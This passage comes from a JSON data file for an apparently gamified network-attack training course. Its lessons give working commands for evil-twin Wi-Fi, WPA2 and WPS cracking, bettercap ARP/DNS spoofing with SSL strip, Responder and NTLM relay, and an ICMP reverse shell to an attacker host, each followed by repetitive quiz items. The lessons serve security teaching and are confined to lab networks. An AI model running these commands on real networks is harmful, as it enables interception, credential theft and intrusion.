Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-evil-twin","cat":"Network Attacks","title":"Evil Twin WiFi Attack","diff":2,"xp":150,"intro":"Create a fake access point with the same SSID as the target.","sections":[{"type":"text","content":"Set up a rogue AP with the same SSID. Deauth clients from the real AP so they connect to yours. Intercept all their traffic."},{"type":"code","lang":"bash","content":"# Create evil twin\nairbase-ng -e 'TargetSSID' -c 6 wlan0mon\n# Or with hostapd\n# Configure DHCP for connected clients\ndnsmasq --interface=at0 --dhcp-range=10.0.0.10,10.0.0.100\n# Deauth clients from real AP\naireplay-ng -0 0 -a REAL_AP_MAC wlan0mon"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"An evil twin attack creates...","opts":["A new SSID","A fake AP with the same SSID as the legitimate network","A VPN","A proxy"],"ans":1},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-wpa-handshake","cat":"Network Attacks","title":"WPA2 Handshake Capture and Cracking","diff":2,"xp":150,"intro":"Capture the 4-way handshake and crack the PSK offline.","sections":[{"type":"text","content":"Deauth a client to force reconnection, capture the 4-way handshake, then crack it offline with a wordlist."},{"type":"code","lang":"bash","content":"airodump-ng -c 6 --bssid AP_MAC -w capture wlan0mon\naireplay-ng -0 5 -a AP_MAC wlan0mon  # force handshake\naircrack-ng capture-01.cap -w rockyou.txt\n# Or hashcat (faster with GPU)\nhashcat -m 22000 capture.hc22000 rockyou.txt"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"The WPA2 4-way handshake is needed to...","opts":["Decrypt traffic directly","Verify a guessed password against the captured handshake offline","Access the AP's admin panel","Clone the AP"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-wps-attack","cat":"Network Attacks","title":"WPS PIN Attack","diff":1,"xp":75,"intro":"Exploit WPS to recover the WiFi password.","sections":[{"type":"text","content":"WPS PIN has a design flaw: the 8-digit PIN can be cracked in ~11000 attempts instead of 100 million because it's verified in two halves."},{"type":"code","lang":"bash","content":"# Check if WPS is enabled\nwash -i wlan0mon\n# Brute-force WPS PIN\nreaver -i wlan0mon -b AP_MAC -vv\nbully -b AP_MAC wlan0mon"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"WPS PIN can be cracked quickly because...","opts":["It's short","It's verified in two halves, reducing attempts from 10^8 to ~11000","It's not encrypted","It uses weak encryption"],"ans":1},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-mitm-bettercap","cat":"Network Attacks","title":"Bettercap MITM Framework","diff":2,"xp":150,"intro":"All-in-one MITM tool: ARP spoof, DNS spoof, SSL strip, credential capture.","sections":[{"type":"text","content":"Bettercap combines ARP spoofing, DNS spoofing, SSL stripping, and credential sniffing into one command-line tool."},{"type":"code","lang":"bash","content":"bettercap -iface eth0\n>> net.probe on\n>> net.sniff on\n>> arp.spoof on\n>> set http.proxy.sslstrip true\n>> http.proxy on\n>> set dns.spoof.domains *.target.com\n>> dns.spoof on"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Bettercap combines...","opts":["Only scanning","ARP spoofing, DNS spoofing, SSL stripping, and credential capture","Only password cracking","Only port scanning"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-responder2","cat":"Network Attacks","title":"Responder for Hash Capture","diff":2,"xp":150,"intro":"Capture NTLMv2 hashes by answering broadcast name resolution.","sections":[{"type":"text","content":"Responder answers LLMNR, NBT-NS, and mDNS queries with your IP. When Windows machines try to authenticate, you capture their NTLMv2 hash."},{"type":"code","lang":"bash","content":"sudo responder -I eth0 -rdwv\n# Hashes captured in: /usr/share/responder/logs/\n# Crack with hashcat\nhashcat -m 5600 hashes.txt rockyou.txt\n# Or relay (no cracking needed)\nimpacket-ntlmrelayx -tf targets.txt -smb2support"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Responder captures hashes by answering...","opts":["DNS queries","LLMNR and NBT-NS broadcast name queries","ARP requests","DHCP requests"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-relay-ntlm","cat":"Network Attacks","title":"NTLM Relay Attack","diff":3,"xp":200,"intro":"Relay captured hashes to authenticate on other systems.","sections":[{"type":"text","content":"Instead of cracking captured NTLMv2 hashes, relay them to another machine. If SMB signing isn't required, you authenticate as the victim."},{"type":"code","lang":"bash","content":"# Find targets without SMB signing\ncrackmapexec smb 10.0.0.0/24 --gen-relay-list targets.txt\n# Relay with ntlmrelayx\nimpacket-ntlmrelayx -tf targets.txt -smb2support\n# Trigger auth: Responder, PetitPotam, or PrinterBug"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"NTLM relay works when the target...","opts":["Uses Kerberos","Doesn't require SMB signing","Has a firewall","Uses encryption"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-port-knocking","cat":"Network Attacks","title":"Port Knocking","diff":2,"xp":150,"intro":"Access hidden services by sending a sequence of connection attempts.","sections":[{"type":"text","content":"Port knocking hides services behind a firewall. Send connections to specific ports in order (knock), and the firewall opens the real service port."},{"type":"code","lang":"bash","content":"# Knock sequence: 7000, 8000, 9000 -> opens SSH\nknock target 7000 8000 9000\nssh user@target\n# Or manually:\nnmap -Pn --host-timeout 100 --max-retries 0 -p 7000 target\nnmap -Pn --host-timeout 100 --max-retries 0 -p 8000 target\nnmap -Pn --host-timeout 100 --max-retries 0 -p 9000 target"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Port knocking reveals hidden services by...","opts":["Scanning all ports","Sending connection attempts in a specific sequence","Brute-forcing passwords","DNS queries"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-icmp-tunnel","cat":"Network Attacks","title":"ICMP Tunneling","diff":3,"xp":200,"intro":"Tunnel data through ICMP echo requests to bypass firewalls.","sections":[{"type":"text","content":"Firewalls that allow ping can be exploited to tunnel arbitrary data inside ICMP packets. icmpsh provides a reverse shell through ICMP."},{"type":"code","lang":"bash","content":"# Server (attacker)\nicmpsh -s attacker_ip\n# Client (on target)\nicmpsh.exe -t attacker_ip\n# Or using ptunnel\nptunnel-ng -p proxy_server -l 8080 -r target -R 22"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than 